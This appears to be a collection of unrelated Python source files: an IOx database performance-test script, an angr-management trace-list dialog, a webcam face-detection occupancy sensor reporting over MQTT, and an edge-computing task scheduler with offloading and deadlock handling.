'n_sequencers': 1,
'options': {},
},
},
},
}
if router_id is not None:
router_grpc_addr = 'localhost:%d' % (router_id * 10000 + 8082)
router = grpc_requests.Client(router_grpc_addr, lazy=True)
router.register_service('influxdata.iox.management.v1.ManagementService')
router.request('influxdata.iox.management.v1.ManagementService', 'CreateDatabase', router_db_rules)
router_http_addr = 'localhost:%d' % (router_id * 10000 + 8080)
router_write_url = 'http://%s/api/v2/write?org=%s&bucket=%s' % (router_http_addr, org_name, bucket_name)
lp = "sentinel,source=perf.py f=1i"
response = requests.post(url=router_write_url, data=lp, timeout=10)
if not response.ok:
print('failed to write to router')
print(response.reason)
print(response.content)
return
else:
print()
print(router_db_rules)
print()
if writer_id is not None:
writer_grpc_addr = 'localhost:%d' % (writer_id * 10000 + 8082)
writer = grpc_requests.Client(writer_grpc_addr, lazy=True)
writer.register_service('influxdata.iox.management.v1.ManagementService')
writer.request('influxdata.iox.management.v1.ManagementService', 'CreateDatabase', writer_db_rules)
writer_http_addr = 'localhost:%d' % (writer_id * 10000 + 8080)
writer_query_url = 'http://%s/api/v3/query' % writer_http_addr
writer_query_params = {'q': 'select count(1) from sentinel', 'd': db_name}
response = requests.get(url=writer_query_url, params=writer_query_params, timeout=10)
for i in range(20):
if response.ok:
break
print('waiting for round trip test to succeed')
time.sleep(0.5)
response = requests.get(url=writer_query_url, params=writer_query_params, timeout=10)
if not response.ok:
print(response.reason)
print(response.content)
return
else:
print()
print(writer_db_rules)
print()
print('created database "%s" on both IOx servers' % db_name)
def run_test_battery(battery_name, router_id, writer_id, debug=False, do_trace=False):
# TODO drop do_trace when IOx can be configured to always trace
print('starting test battery "%s"' % battery_name)
failed = False
# Write
battery_dir = os.path.join(os.getcwd(), battery_name)
datagen_filename = os.path.join(battery_dir, 'datagen.toml')
if debug:
iox_data_generator_path = os.path.abspath(os.path.join(os.getcwd(), '../target/debug/iox_data_generator'))
else:
iox_data_generator_path = os.path.abspath(os.path.join(os.getcwd(), '../target/release/iox_data_generator'))
router_http_addr = 'localhost:%d' % (router_id * 10000 + 8080)
args = [iox_data_generator_path,
'--host', router_http_addr, '--token', 'arbitrary',
'--org', org_name, '--bucket', bucket_name,
'--spec', datagen_filename]
env = {
'RUST_BACKTRACE': '0',
}
log_file = open('logs/test.log', mode='w')
if subprocess.run(args=args, stdout=log_file, stderr=log_file, env=env).returncode != 0:
raise ChildProcessError(
'failed to run iox_data_generator for battery "%s", check %s' % (battery_name, log_file.name))
# Query
writer_http_addr = 'localhost:%d' % (writer_id * 10000 + 8080)
query_url = 'http://%s/api/v3/query' % writer_http_addr
queries_filename = os.path.join(battery_dir, 'queries.toml')
queries = toml.load(open(queries_filename))
for query in queries['queries']:
if 'sql' not in query:
print('query missing SQL query')
print(query)
print()
failed = True
continue
sql = query['sql']
name = query['name']
if name is None:
name = sql
print('running test "%s"' % name)
time_start = time.time()
params = {'q': sql, 'format': 'csv', 'd': db_name}
headers = {}
if do_trace:
# TODO remove this after IOx can be configured to sample 100% of traces
headers['jaeger-debug-id'] = 'from-perf'
response = requests.get(url=query_url, params=params, headers=headers)
time_delta = '%dms' % math.floor((time.time() - time_start) * 1000)
if not response.ok:
print(response.reason)
print(response.content.decode('UTF-8'))
print()
failed = True
continue
got = response.content.decode('UTF-8').strip()
print('time: %s' % time_delta)
if 'expect' in query:
expect = query['expect'].strip()
if expect != got:
print('expected: %s' % expect)
print('got: %s' % got)
failed = True
else:
print('OK')
elif 'expect_filename' in query:
path = pathlib.Path(os.path.join(battery_dir, query['expect_filename']))
if not path.is_file():
print('file "%s" not found' % path)
print()
failed = True
continue
expect = open(path).read().strip()
if expect != got:
print('expected: %s' % expect)
print('got: %s' % got)
failed = True
else:
print('OK')
else:
print('OK')
print()
print('completed test battery "%s"' % battery_name)
return not failed
if __name__ == "__main__":
logging.getLogger('grpc_requests.client').setLevel(logging.ERROR)
main()
|
chess_trace_list.py
|
# pylint:disable=unused-argument
import typing
from typing import List, Optional, Tuple, TYPE_CHECKING
import threading
import asyncio
from tornado.platform.asyncio import AnyThreadEventLoopPolicy
import PySide2
from PySide2.QtWidgets import QDialog, QPushButton, QHBoxLayout, QVBoxLayout, QMessageBox, QTableView, \
QAbstractItemView, QHeaderView, QLabel
from PySide2.QtCore import Qt, QAbstractTableModel
try:
import slacrs
except ImportError:
slacrs = None
from angrmanagement.logic.threads import gui_thread_schedule_async
from angrmanagement.config import Conf
if TYPE_CHECKING:
from angrmanagement.ui.workspace import Workspace
class TraceDescriptor:
"""
Models a trace.
"""
def __init__(self, trace_id: str, input_id: str, created_at, type_: str):
self.trace_id = trace_id
self.input_id = input_id
self.created_at = created_at
self.type = type_
class QTraceTableModel(QAbstractTableModel):
"""
Implements a table model for traces.
"""
Headers = ["Trace ID", "Created at", "Input ID", "Input Length", "Type"]
COL_TRACEID = 0
COL_CREATEDAT = 1
COL_INPUTID = 2
COL_INPUTLENGTH = 3
COL_TYPE = 4
def __init__(self):
super().__init__()
self._traces: List[TraceDescriptor] = [ ]
@property
def traces(self):
return self._traces
@traces.setter
def traces(self, v):
self.beginResetModel()
self._traces = v
self.endResetModel()
def rowCount(self, parent:PySide2.QtCore.QModelIndex=...) -> int:
return len(self.traces)
def columnCount(self, parent:PySide2.QtCore.QModelIndex=...) -> int:
return len(self.Headers)
def headerData(self, section:int, orientation:PySide2.QtCore.Qt.Orientation, role:int=...) -> typing.Any:
if role != Qt.DisplayRole:
return None
if section < len(self.Headers):
return self.Headers[section]
return None
def data(self, index:PySide2.QtCore.QModelIndex, role:int=...) -> typing.Any:
if not index.isValid():
return None
row = index.row()
if row >= len(self.traces):
return None
trace = self.traces[row]
col = index.column()
if role == Qt.DisplayRole:
return self._get_column_text(trace, col)
return None
@staticmethod
def _get_column_text(trace: TraceDescriptor, col: int) -> str:
mapping = {
QTraceTableModel.COL_TRACEID: QTraceTableModel._get_trace_id,
QTraceTableModel.COL_CREATEDAT: QTraceTableModel._get_trace_created_at,
QTraceTableModel.COL_TYPE: QTraceTableModel._get_trace_type,
QTraceTableModel.COL_INPUTID: QTraceTableModel._get_trace_input_id,
QTraceTableModel.COL_INPUTLENGTH: lambda x: "Unknown",
}
return mapping[col](trace)
@staticmethod
def _get_trace_id(trace: TraceDescriptor) -> str:
return trace.trace_id
@staticmethod
def _get_trace_created_at(trace: TraceDescriptor) -> str:
return trace.created_at
@staticmethod
def _get_trace_type(trace: TraceDescriptor) -> str:
return trace.type
@staticmethod
def _get_trace_input_id(trace: TraceDescriptor) -> str:
return trace.input_id
class QTraceTableView(QTableView):
"""
Implements a trace view for CHESS traces.
"""
def __init__(self):
super().__init__()
self.horizontalHeader().setVisible(True)
self.verticalHeader().setVisible(False)
self.setSelectionBehavior(QAbstractItemView.SelectRows)
self.setSelectionMode(QAbstractItemView.MultiSelection)
self.setHorizontalScrollMode(self.ScrollPerPixel)
self.horizontalHeader().setDefaultAlignment(Qt.AlignLeft)
self.horizontalHeader().setSectionResizeMode(QHeaderView.ResizeToContents)
self.model: QTraceTableModel = QTraceTableModel()
self.setModel(self.model)
class QChessTraceListDialog(QDialog):
"""
Implements a CHESS trace list dialog.
"""
def __init__(self, workspace: 'Workspace', parent=None):
super().__init__(parent)
if slacrs is None:
QMessageBox.Critical(self,
"Slacrs is not installed",
"Cannot import slacrs. Please make sure slacrs is properly installed.",
QMessageBox.Ok)
self.close()
return
self.workspace = workspace
self.trace_ids: Optional[List[Tuple[str,str]]] = None # input ID, trace ID
self.setMinimumWidth(400)
self._status_label: QLabel = None
self._table: QTraceTableView = None
self._ok_button: QPushButton = None
self._cancel_button: QPushButton = None
self.setWindowTitle("Open traces from CHECRS")
self.setWindowFlags(self.windowFlags() & ~Qt.WindowContextHelpButtonHint)
self._init_widgets()
self._status_label.setText("Loading...")
self.workspace.main_window.app.processEvents()
th = threading.Thread(target=self._load_traces, daemon=True)
th.start()
def _init_widgets(self):
# table
self._table = QTraceTableView()
# status
status_lbl = QLabel("Status:")
self._status_label = QLabel()
status_layout = QHBoxLayout()
status_layout.addWidget(status_lbl)
status_layout.addWidget(self._status_label)
status_layout.addStretch(0)
# buttons
self._ok_button = QPushButton("Ok")
self._ok_button.clicked.connect(self._on_ok_button_clicked)
self._cancel_button = QPushButton("Cancel")
self._cancel_button.clicked.connect(self._on_cancel_button_clicked)
buttons_layout = QHBoxLayout()
buttons_layout.addWidget(self._ok_button)
buttons_layout.addWidget(self._cancel_button)
layout = QVBoxLayout()
layout.addWidget(self._table)
layout.addLayout(status_layout)
layout.addLayout(buttons_layout)
self.setLayout(layout)
def _load_traces(self):
from slacrs.model import Input, Trace # pylint:disable=import-outside-toplevel,import-error
asyncio.set_event_loop_policy(AnyThreadEventLoopPolicy())
connector = self.workspace.plugins.get_plugin_instance_by_name("ChessConnector")
if connector is None:
return
session = slacrs.Slacrs(database=Conf.checrs_backend_str).session()
target_image_id = connector.target_image_id
if not target_image_id:
return
traces: List[TraceDescriptor] = [ ]
db_traces = session.query(Trace).join(Trace.input).filter(
Input.target_image_id == target_image_id
)
for db_trace in db_traces:
db_trace: Trace
t = TraceDescriptor(db_trace.id, db_trace.input_id, db_trace.created_at, "block trace")
traces.append(t)
session.close()
gui_thread_schedule_async(self._update_table, args=(traces,))
def _update_table(self, traces):
self._table.model.traces = traces
self._table.viewport().update()
self._status_label.setText("Ready.")
#
# Events
#
def _on_ok_button_clicked(self):
selection_model = self._table.selectionModel()
if not selection_model.hasSelection():
QMessageBox.warning(self,
"No target is selected",
"Please select a CHESS target to continue.",
QMessageBox.Ok)
return
rows = selection_model.selectedRows()
self.trace_ids = [ ]
for row in rows:
trace = self._table.model.traces[row.row()]
self.trace_ids.append((trace.input_id, trace.trace_id))
self.close()
def _on_cancel_button_clicked(self):
self.close()
|
face-recognition-occupancy.py
|
# import the necessary packages
import numpy as np
import argparse
import cv2
from time import sleep
import paho.mqtt.client as mqtt
from threading import Thread
import json
State = True
webcam = None
# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-p", "--prototxt", default="deploy.prototxt.txt",
help="path to Caffe 'deploy' prototxt file")
ap.add_argument("-m", "--model", default="res10_300x300_ssd_iter_140000.caffemodel",
help="path to Caffe pre-trained model")
ap.add_argument("-c", "--confidence", type=float, default=0.6,
help="minimum probability to filter weak detections")
args = vars(ap.parse_args())
with open("config.json") as conf:
config = json.load(conf)
# mqtt connection
def on_connect(client, userdata, flags, rc):
if rc == 0:
print("Connected with result code " + str(rc))
print("Subscribing to topic",(config["mqttTopic"] + "/cmd"))
client.subscribe((config["mqttTopic"] + "/cmd"))
else:
print("Bad connection with result code " + str(rc))
client.loop_stop()
exit(1)
def on_message(client, userdata, message):
global State
print("message received " ,str(message.payload.decode("utf-8")))
print("message topic=",message.topic)
print("message qos=",message.qos)
print("message retain flag=",message.retain)
if (str(message.payload.decode("utf-8")) == "off"):
State = False
if (str(message.payload.decode("utf-8")) == "on"):
State = True
client = mqtt.Client(config["mqttClient"])
client.username_pw_set(username=config["mqttUser"], password=config["mqttPass"])
client.on_connect = on_connect
client.on_message=on_message #attach function to callback
try:
client.connect(config["mqttServer"], 1883, 60)
except:
print("Error: MQTT connection failed")
exit(1)
client.loop_start()
# Define the thread that will continuously pull frames from the camera
class CameraBufferCleanerThread:
def __init__(self):
self._running = True
self.last_frame = None
def terminate(self):
self._running = False
def run(self, camera):
self._running = True
while self._running:
ret, self.last_frame = camera.read()
# load serialized model from disk
print("[INFO] loading model...")
net = cv2.dnn.readNetFromCaffe(args["prototxt"], args["model"])
# create a cleaning thread object
cam_cleaner = CameraBufferCleanerThread()
t = None
#main loop
Startup = True
while True:
if State:
if Startup:
# startup webcam
print("[INFO] starting up webcam..")
webcam = cv2.VideoCapture(0)
# Start the cleaning thread
t = Thread(target = cam_cleaner.run, args =(webcam, ))
t.start()
Startup = False
if cam_cleaner.last_frame is not None:
frame = cam_cleaner.last_frame
# load the input image and construct an input blob for the image
# by resizing to a fixed 300x300 pixels and then normalizing it
image = frame
(h, w) = image.shape[:2]
blob = cv2.dnn.blobFromImage(cv2.resize(image, (300, 300)), 1.0,
(300, 300), (104.0, 177.0, 123.0))
# pass the blob through the network and obtain the detections and
# predictions
print("[INFO] computing object detections...")
net.setInput(blob)
detections = net.forward()
detected = False
# loop over the detections
for i in range(0, detections.shape[2]):
# extract the confidence (i.e., probability) associated with the
# prediction
confidence = detections[0, 0, i, 2]
# filter out weak detections by ensuring the `confidence` is
# greater than the minimum confidence
if confidence > args["confidence"]:
detected = True
print(confidence)
print("publishing occupied")
client.publish(config["mqttTopic"], "Occupied")
# client.publish((config["mqttTopic"] + "/confidence"), str(confidence))
if not detected:
print("publishing unoccupied")
client.publish(config["mqttTopic"], "Unoccupied")
# client.publish((config["mqttTopic"] + "/confidence"), str(confidence))
sleep(2)
if not State:
# terminate the cleaning thread
cam_cleaner.terminate()
if t != None:
if not State and not t.is_alive():
# stop the webcam and set the startup variable
webcam.release()
Startup = True
|
algo_three.py
|
from functools import reduce
from sys import *
import numpy as np
import random as r
import socket
import struct
import subprocess as sp
import threading
from threading import Thread
import ast
import time
import datetime as dt
import os
import psutil
from netifaces import interfaces, ifaddresses, AF_INET
import paho.mqtt.client as mqtt
import smtplib
import config
import paramiko
import argparse
import pickle
_tasks = {'t1': {'wcet': 3, 'period': 20, 'deadline': 15},
't2': {'wcet': 1, 'period': 5, 'deadline': 4},
't3': {'wcet': 2, 'period': 10, 'deadline': 8},
't4': {'wcet': 1, 'period': 10, 'deadline': 9},
't5': {'wcet': 3, 'period': 15, 'deadline': 12}
}
# mat = {'p0': ['cpu', 'mem', 'storage']}
_need = {
't1': [7, 4, 3],
't2': [1, 2, 2],
't3': [6, 0, 0],
't4': [0, 1, 1],
't5': [4, 3, 1]
}
allocation = {
't1': [0, 1, 0],
't2': [2, 0, 0],
't3': [3, 0, 2],
't4': [2, 1, 1],
't5': [0, 0, 2]
}
_cpu = [] # cpu plot list
prev_t = 0 # variable for cpu util
_off_mec = 0 # used to keep a count of tasks offloaded from local mec to another mec
_off_cloud = 0 # used to keep a count of tasks offloaded to cloud
_loc = 0 # used to keep a count of tasks executed locally
_inward_mec = 0 # used to keep a count of tasks offloaded from another mec to local mec
deadlock = [1] # keeps count of how many deadlock is resolved
memory = []
mec_waiting_time = {} # {ip : [moving (waiting time + rtt)]}
mec_rtt = {} # {ip: [RTT]}
offload_register = {} # {task: host_ip} to keep track of tasks sent to mec for offload
reoffload_list = [[], {}] # [[task_list],{wait_time}] => records that’s re-offloaded to mec to execute.
discovering = 0 # if discovering == 0 update host
test = []
_time = []
_pos = 0
received_task_queue = [] # [[(task_list,wait_time), host_ip], ....]
received_time = []
thread_record = []
_port_ = 64000
cloud_register = {} # ={client_id:client_ip} keeps address of task offloaded to cloud
cloud_port = 63000
task_record = {} # keeps record of task reoffloaded
task_id = 0
shared_resource_lock = threading.Lock()
t_track = 1
def ping(host):
cmd = [f'ping -c 1 {host}']
output = str(sp.check_output(cmd, shell=True), 'utf-8').split('\n')
try:
value = float(output[-2].split('=')[-1].split('/')[0])
except ValueError:
value = None
return value
def discovering_group():
global sock1
multicast_group = '224.3.29.71'
server_address = ('', 10000)
# Create the socket
sock1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock1.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock1.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def offloading_group():
global sock2
multicast_group = '224.5.5.55'
server_address = ('', 20000)
# Create the socket
sock2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock2.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock2.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def ip_address():
try:
cmd = ['ifconfig eth1 | grep inet | cut -d ":" -f 2 | cut -d " " -f 1']
address = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
if len(address.strip().split('.')) == 4:
return address.strip()
else:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
except Exception as e:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def _memory():
global memory
memory.append(round(my_algo.memory_percent(), 4))
def m_cpu():
global prev_t
# get cpu
next_t = psutil.cpu_percent(percpu=False)
delta = abs(prev_t - next_t)
prev_t = next_t
_cpu.append(round(delta, 4))
def get_mec_rtts():
for i in mec_rtt:
mec_rtt[i].append(get_rtt(i))
def generate_results():
_memory()
m_cpu()
get_mec_rtts()
def host_ip_set():
global ip_set
ip_set = set()
for ifaceName in interfaces():
addresses = [i['addr'] for i in ifaddresses(ifaceName).setdefault(AF_INET, [{'addr': 'No IP addr'}])]
ip_set.add(', '.join(addresses))
def get_time():
_time_ = []
d = str(dt.datetime.utcnow()).split()
_time_ += d[0].split('-')
g = d[1].split('.')
_time_ += g[0].split(':')
_time_.append(g[1])
return _time_
def get_rtt(host):
rtt = ping(host)
if rtt:
return round(rtt, 4)
else:
return get_rtt(host)
def gcd(a, b):
if b == 0:
return a
return gcd(b, a % b)
def _lcm(a, b):
return int(a * b / gcd(a, b))
def lcm(_list):
return reduce(_lcm, _list)
def gosh_dist(_range):
return ((23 ** r.randrange(1, 1331)) % r.randrange(1, 1777)) % _range
def on_connect(connect_client, userdata, flags, rc):
# print("Connected with Code :" +str(rc))
# Subscribe Topic from here
connect_client.subscribe(node_id)
# Callback Function on Receiving the Subscribed Topic/Message
def on_message(message_client, userdata, msg):
global run
data = str(msg.payload, 'utf-8')
if data[0] == 'c': # receive from cloud
received_task = data[2:]
# send_client({received_task: get_time()}, cloud_register[received_task.split('.')[2]])
if received_task in task_record:
del task_record[received_task]
received_task = '.'.join(received_task.split('.')[:-1])
_client.publish(topic=received_task.split('.')[2], payload=str({received_task: get_time() + ['cloud']}), )
cooperate['cloud'] += 1
count_task_sent(received_task)
elif data[0] == 't': # receive from client
received_task = ast.literal_eval(data[2:])
received_task_queue.append(received_task)
received_time.append(time.time())
elif data.strip() == 'stop': # stop {hostname: ip}
print('sending stop alert')
run = 0
def connect_to_broker(stop):
global _client
username = 'mec'
password = 'password'
broker_port_no = 1883
_client = mqtt.Client()
_client.on_connect = on_connect
_client.on_message = on_message
_client.username_pw_set(username, password)
_client.connect(broker_ip, broker_port_no, 60)
_client.loop_start()
while True:
if stop():
_client.loop_stop()
_client.disconnect()
print('broker loop terminated')
break
def task_time_map(seq, process):
exe_seq = []
capacity_sum = 0
for job in process:
capacity_sum += process[job]['wcet']
while capacity_sum > 0:
for job in seq:
if process[job]['wcet'] > 0:
exe_seq.append(job)
process[job]['wcet'] -= 1
capacity_sum -= 1
return exe_seq
def load_tasks():
period_list = [tasks[i]['period'] for i in tasks]
lcm_period = lcm(period_list)
# insert idle task
s_task = {**tasks, 'idle': {'wcet': lcm_period, 'period': lcm_period + 1}}
return lcm_period, s_task
total_received_task = 0
def scheduler(_lcm_, s_tasks): # RMS algorithm
global total_received_task
queue = list(s_tasks.keys()) # initialize task queue
schedule = []
rms = []
curr = '' # current task
prev = '' # previous task
tmp = {}
for task in s_tasks.keys():
tmp[task] = {} # temporary data for each task
tmp[task]['deadline'] = s_tasks[task]['period']
tmp[task]['executed'] = 0
# start scheduling...
# proceed by one timestamp to handle preemption
for _time_ in range(_lcm_):
# insert new tasks into the queue
for t in tmp.keys():
if _time_ == tmp[t]['deadline']:
if s_tasks[t]['wcet'] > tmp[t]['executed']:
# print('Scheduling Failed at %d' % time)
exit(1)
else:
tmp[t]['deadline'] += s_tasks[t]['period']
tmp[t]['executed'] = 0
queue.append(t)
# select next task to be scheduled
_min_ = _lcm_ * 2
for task in queue:
if tmp[task]['deadline'] < _min_:
_min_ = tmp[task]['deadline']
curr = task
tmp[curr]['executed'] += 1
# print(time, queue, curr)
# dequeue the execution-completed task
if tmp[curr]['executed'] == s_tasks[curr]['wcet']:
for i in range(len(queue)):
if curr == queue[i]:
del queue[i]
break
# record to the schedule trace
if prev != curr:
if prev in queue and prev != 'idle': # previous task is preempted..
s = schedule.pop()
schedule.append([s[0], s[1], '*'])
rms.append(s[1])
schedule.append([_time_, curr])
if curr != 'idle':
rms.append(curr)
prev = curr
process = {task: {'wcet': tasks[task]['wcet']} for task in tasks}
rms = task_time_map(seq=rms, process=process)
total_received_task += len(rms)
return rms
# generate execution sequence
def wound_wait(processes, avail, n_need, allocat):
global deadlock
offload = []
# To store execution sequence
exec_seq = []
# Make a copy of available resources
work = [0] * len(processes)
# While all processes are not finished
# or system is not in safe state.
while 0 in work:
ind = work.index(0)
i = processes[ind]
# print('comparing| process: ', i, n_need[i], 'work: ', avail)
if not (False in list(np.greater_equal(avail, n_need[i]))):
exec_seq.append(i)
avail = np.add(avail, allocat[i])
work[ind] = 1
else:
a = list(set(processes) - set(exec_seq) - set(offload))
n = {}
for j in a:
n[j] = sum(allocat[j])
_max = max(n, key=n.get)
# print('work: ', work, 'need: ', _need[_max])
if not (False in list(np.greater_equal(np.array(avail) + np.array(allocat[_max]), n_need[i]))):
offload.append(_max)
avail = np.array(avail) + np.array(allocat[_max])
work[processes.index(_max)] = 1
else:
offload.append(i)
avail = np.array(avail) + np.array(allocat[i])
work[processes.index(i)] = 1
if len(offload) > 0:
print('offloading tasks: ', offload)
cooperative_mec(offload)
deadlock[0] += 1
print('Execution seq: ', exec_seq)
return exec_seq
def get_exec_seq(pro):
# Number of processes
p = len(pro)
processes = ['{}_{}'.format(pro[i], i) for i in range(len(pro))]
# Available instances of resources
avail = [6, 5, 5]
n_need = {i: _need[i[:2]] for i in processes}
# print('need', n_need)
# Resources allocated to processes
allot = {i: allocation[i[:2]] for i in processes}
# return execution sequence
return wound_wait(processes, avail, n_need, allot)
def calc_wait_time(list_seq):
pre = 0
time_dic = {}
for i in list_seq:
j = i.split('_')[0]
time_dic[i] = round(t_time[j][0] + pre, 3)
pre += t_time[j][0]
# waiting time = total waiting time ÷ 2 average waiting time might be too tight
w_send = round(time_dic[list(time_dic.keys())[-1]] / 2, 3)
send_message('wt {} {}'.format(ip_address(), str(w_send))) # Broadcasting waiting time to cooperative MECs
return time_dic
def compare_local_mec(list_seq):
time_compare_dict = {i: t_time[i.split('_')[0]][1] > list_seq[i] for i in list_seq}
print('local vs MEC comparison: ', time_compare_dict)
execute_mec = []
execute_locally = []
for i in time_compare_dict:
if time_compare_dict[i]:
execute_locally.append(i)
else:
execute_mec.append(i)
return execute_mec, execute_locally
def calculate_mov_avg(ma1, a1):
if ma1 in mec_waiting_time:
_count = len(mec_waiting_time[ma1])
avg1 = mec_waiting_time[ma1][-1]
else:
_count = 0
avg1 = 0
_count += 1
avg1 = ((_count - 1) * avg1 + a1) / _count
# ma1.append(avg1) #cumulative average formula
# μ_n=((n-1) μ_(n-1) + x_n)/n
return round(avg1, 4)
def send_message(mg):
_multicast_group = ('224.3.29.71', 10000)
try:
# Send data to the multicast group
if mg == 'hello':
smg = mg + ' ' + str([get_hostname(), ip_address()])
sock1.sendto(str.encode(smg), _multicast_group)
print('\nHello message sent')
else:
sock1.sendto(str.encode(mg), _multicast_group)
except Exception as e:
print(e)
def get_hostname():
cmd = ['cat /etc/hostname']
hostname = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
return hostname
def receive_message(stop): # used for multi-cast message exchange among MEC
global hosts
while True:
if stop():
print('Stopped: receive_message()')
break
else:
data, address = sock1.recvfrom(1024)
_d = data.decode()
if _d[:5] == 'hello':
_data = ast.literal_eval(_d[6:])
hosts[_data[0]] = _data[1]
if _data[1] != host_ip:
mec_rtt[_data[1]] = []
elif (_d[:6] == 'update') and (discovering == 0):
hosts = ast.literal_eval(_d[7:])
# print('received: ', hosts)
for i in hosts:
if i != host_ip:
mec_rtt[i] = []
elif _d[:2] == 'wt':
split_data = _d.split()
if split_data[1] != host_ip:
w_time = calculate_mov_avg(split_data[1], float(split_data[2]) + get_rtt(
address[0])) # calcuate moving average of mec wait time => w_time = wait time + rtt
if split_data[1] in mec_waiting_time:
mec_waiting_time[split_data[1]].append(w_time)
else:
mec_waiting_time[split_data[1]] = [w_time]
def mec_comparison():
# returns min average waiting for all mecs
if len(mec_waiting_time) == 0:
return 0
min_mec = {i: mec_waiting_time[i][-1] for i in mec_waiting_time}
min_wt = min(min_mec, key=min_mec.get)
return min_wt
def cooperative_mec(mec_list):
global _off_cloud
global _off_mec
global task_id, task_record
for i in mec_list:
_host = mec_comparison()
if _host == 0:
# send_cloud([i.split('_')[0], t_time[i.split('_')[0]][0]]) # [task_id,exec_time]
_send_task = f"{i.split('_')[0]}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[i.split('_')[0]][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# cloud_register[i.split('_')[0].split('.')[2]] = send_back_host
print('\n=========SENDING {} TO CLOUD==========='.format(i))
else:
j = i.split('_')[0]
_max = np.array([6, 5, 5])
send = 'false'
if not (False in list(np.greater_equal(_max, _need[j[:2]]))):
send = 'true'
# CHECK IF THE MINIMUM MEC WAIT TIME IS LESS THAN LATENCY
if mec_waiting_time[_host][-1] < t_time[j][1] and send == 'true':
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
elif send == 'true' and (get_rtt(_host) < get_rtt(cloud_ip)):
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
else:
_send_task = f"{j}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[j][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# send_cloud([j, t_time[j][0]]) # # [task_id,exec_time]
# cloud_register[j.split('.')[2]] = send_back_host
print('\n=========SENDING {} TO CLOUD==========='.format(i))
outward_mec = 0
offload_check = [0, 0]
def execute_re_offloaded_task(offloaded_task):
global outward_mec, offload_check
exec_list = get_exec_seq(offloaded_task[0])
# if len(exec_list) != len(offloaded_task[0]):
# print('\n\n', '@ ' * 50)
# print('exec: ', exec_list, 'off: ', offloaded_task[0])
# print('\n\n', '@ ' * 50)
# offload_check.append((exec_list, offloaded_task[0]))
outward_mec += len(exec_list)
for i in offloaded_task[0]: # i = 't1.1.2.3*1_3'
j = i.split('_')[0]
time.sleep(offloaded_task[1][j] / 2)
# print('j task: ', j)
send_offloaded_task_mec('{} {}'.format(j.split('.')[1], i.split('*')[0]))
clients_record = {}
def count_task_sent(task):
global clients_record
c_id = task.split('.')[2]
if c_id in clients_record:
clients_record[c_id] += 1
else:
clients_record[c_id] = 1
def execute(local):
print('\nExecuting :', local)
for i in local:
j = i.split('_')[0]
_t = t_time[j][0] / 2
time.sleep(_t)
print('#{}'.format(local.index(i) + 1), ' Executed: ', i)
_client.publish(j.split('.')[2], str({j: get_time() + ['local']}), )
count_task_sent(j)
print('============== EXECUTION DONE ===============')
cooperate = {'mec': 0, 'cloud': 0}
def receive_offloaded_task_mec(stop): # run as a thread
global _inward_mec
global t_track
while True:
if stop():
print('Stopped: receive_offloaded_task_mec()')
break
else:
data, address = sock2.recvfrom(1024)
if len(data.decode()) > 0:
da = data.decode().split(' ')
if (address[0] not in ip_set) and (da[0] == node_id): # send back to client
# send_client({da[1]: get_time()}, offload_register[da[1]]) # send back to client
if da[1] in task_record:
del task_record[da[1]]
task_new = '.'.join(da[1].split('.')[:-1])
_client.publish(da[1].split('.')[2], str({task_new: get_time() + ['mec']}), )
count_task_sent(da[1])
cooperate['mec'] += 1
else:
print('*' * 30 + f'\n{da[1]} Not in Task Record\n' + '*' * 30)
elif (address[0] not in ip_set) and (da[0] == 'ex') and (da[1] == node_id):
_received = ast.literal_eval(da[2] + da[3])
shared_resource_lock.acquire()
task = _received[0] + '*{}'.format(t_track)
reoffload_list[0].append(task)
reoffload_list[1][task] = _received[1]
shared_resource_lock.release()
t_track += 1
_inward_mec += 1
def call_execute_re_offload(stop):
global reoffload_list, outward_mec
global offload_check
while True:
if stop():
print('Stopped: call_execute_re_offload()')
break
else:
if len(reoffload_list[0]) == 1:
t = reoffload_list[0][-1]
time.sleep(reoffload_list[1][t] / 2)
shared_resource_lock.acquire()
reoffload_list[0].remove(t)
del reoffload_list[1][t]
shared_resource_lock.release()
send_offloaded_task_mec('{} {}'.format(t.split('.')[1], t.split('*')[0]))
outward_mec += 1
offload_check[0] += 1
elif len(reoffload_list[0]) > 1:
o = reoffload_list.copy()
offload_check[1] += len(o)
execute_re_offloaded_task(o)
for i in o[0]:
shared_resource_lock.acquire()
reoffload_list[0].remove(i)
del reoffload_list[1][i]
shared_resource_lock.release()
def send_email(msg, send_path):
try:
server = smtplib.SMTP_SSL('smtp.gmail.com')
server.ehlo()
server.login(config.email_address, config.password)
subject = 'Deadlock results rms+wound-wait {} {}'.format(get_hostname(), send_path)
